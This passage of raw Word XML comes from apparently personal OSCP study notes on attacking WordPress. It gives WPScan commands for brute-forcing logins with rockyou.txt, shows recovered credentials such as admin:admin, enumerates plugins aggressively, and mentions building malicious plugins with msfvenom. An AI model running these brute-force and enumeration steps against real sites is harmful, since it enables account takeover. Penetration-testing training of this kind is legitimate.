    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CF3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Earlier in the writeup, we found a user named hugo on wordpress, and the website said that his password was changed, so that was a potential clue to bruteforce it, so using WPScan, we can bruteforce passwords using the rockyou.txt list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CF4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan --url http://10.10.10.10/ --usernames hugo --passwords /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="792"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute force passwords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CF7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CF8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="247"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2400300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="520" name="image508.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image508.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId95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CF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="247"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output with the password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CFA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CFB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then we later did this to the user c0ldd, who is the admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CFC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CFD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan --url http://192.168.43.146/ --usernames </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">username.txt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--passwords </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">password.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="569"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also add a username list as well for brute forcing usernames, and here I also specified password list but you don't have to </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CFF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="569"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also replace "--usernames" with "-U" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D00">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="569"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also replace "--passwords" with "-P"</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan --url http://192.168.120.50 -t 40 -e u1-1000 --passwords /usr/share/wordlists/rockyou.txt --force</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D04">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one bruteforces usernames (user ID from 1 to 1000) and the rockyou list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you scroll up to the top of the WordPress section, I already showed this command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D06">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2794000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="317" name="image320.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image320.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId95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D07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1072"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From here, you can see it worked since it found the credentials admin:admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D08">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7i97apvbz1u0" w:id="397"/>
      <w:bookmarkEnd w:id="397"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using WPScan to find vulnerable plugins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D09">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D0A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId956">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">wordpwn.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a tool I've seen being used to create malicious plugins using msfvenom but you can probably just make them manually</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1176"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">However, this does use a meterpeter shell, which has limited usage in OSCP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D0C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D0D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From OSCP (27.1.2. WEBSRV1):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D0E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D0F">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WordPress themes and plugins are written by the community and many vulnerabilities are improperly patched or are simply never fixed at all. This makes plugins and themes a great target for compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D10">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's perform a scan on these components with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WPScan</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a WordPress vulnerability scanner. This tool attempts to determine the WordPress versions, themes, and plugins as well as their vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D11">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WPScan looks up component vulnerabilities in the</w:t>
      </w:r>
      <w:hyperlink r:id="rId957">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId958">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">WordPress Vulnerability Database</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which requires an API token. A limited API key can be obtained for free by registering an account on the WPScan homepage. However, even without providing an API key, WPScan is a great tool to enumerate WordPress instances.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D12">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To perform the scan without an API key, we'll provide the URL of the target for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--url</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, set the plugin detection to aggressive, and specify to enumerate all popular plugins by entering </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as an argument to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--enumerate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. In addition, we'll use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-o</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create an output file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D13">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan --url http://192.168.50.244 --enumerate p --plugins-detection aggressive -o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">websrv1/wpscan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="999"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This prints the output to a directory called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">websrv1/wpscan </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">but you can change that</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="999"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also remove the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--plugins-detection aggressive</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" but sometimes the aggressive flag helps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D16">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="999"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can remove the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-o websrv1/wpscan</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" if you don't need to save the output to a file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D17">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D18">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat websrv1/wpscan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D19">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D1A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4358856" cy="6405563"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="206" name="image202.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image202.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId959"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4358856" cy="6405563"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D1B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D1C">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
